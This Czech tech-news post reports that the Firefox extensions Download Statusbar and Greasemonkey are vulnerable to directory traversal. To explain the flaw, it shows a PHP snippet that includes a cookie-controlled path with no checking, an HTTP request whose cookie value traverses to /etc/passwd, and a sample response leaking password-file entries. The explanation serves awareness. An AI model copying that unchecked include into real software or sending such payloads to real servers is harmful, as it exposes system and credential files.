Firefox s některými rozšířeními je zranitelný |
 |
 |
|
Používáte rozšíření do firefoxu? Pak můžete vážně ohrozit zabezpečení Vašeho počítače. Ne všichni tvůrci těchto rozšíření dbají i na maximální bezpečnost.
Mozila popisuje tyto chyby ve svojem bug listu. Tyto chyby zabezpečením vznikly nezapezpečením na tzv.Directory traversal chybu zabezpečení. Jedná se o chybu která podstrkává přes prohlížeč požadavky na získání systémových informací. Typický příklad: www aplikace {code} <?php $template = "blue.php"; if ( is_set( $_COOKIE["TEMPLATE"] ) ) $template = $_COOKIE["TEMPLATE"]; include ( "/home/users/phpguru/templates/" . $template ); ?>{/code} požadavek {code} GET /vulnerable.php HTTP/1.0 Cookie: TEMPLATE=../../../../../../../../../etc/passwd{/code} a výsledek pak může být takový {code} HTTP/1.0 200 OK Content-Type: text/html Server: Apache root:fi3sED95ibqR6:0:1:System Operator:/:/bin/ksh daemon:*:1:1::/tmp: phpguru:f8fk3j1OIf31.:182:100:Developer:/home/users/phpguru/:/bin/csh{/code} Jak je vidno z příkladu je takový útok jednoduchý a velice účiný k získání důvěrných systémových informací. Tato bezpečnostní chyba, která toto umožňuje se vyskytuje v těchto rozšířeních: Download Statusbar Greasemonkey zdroj: bugzilla.mozilla.org
|
Sdílejte s přátely
Nejnovější
- Microsoft SkyDrive
- Spuštěn web kosmetického studia Ellen
- Spuštěn nový web www.cistyfestival.cz
- www.castingfm.cz
- Disk Google. Nic nemažte. Sdílejte cokoli.
- Verze Windows 8
- Konec podpory Windows Vista
- 31.března je Světový den zálohování
- vcelaricifm.cz
- Internet Explorer - prohlížeč, který jste rádi nenáviděli
Server
Stránky běží na vlastním linuxovém serveru umístěném na páteřní lince. Jako HTTP server jsme zvolili APACHE.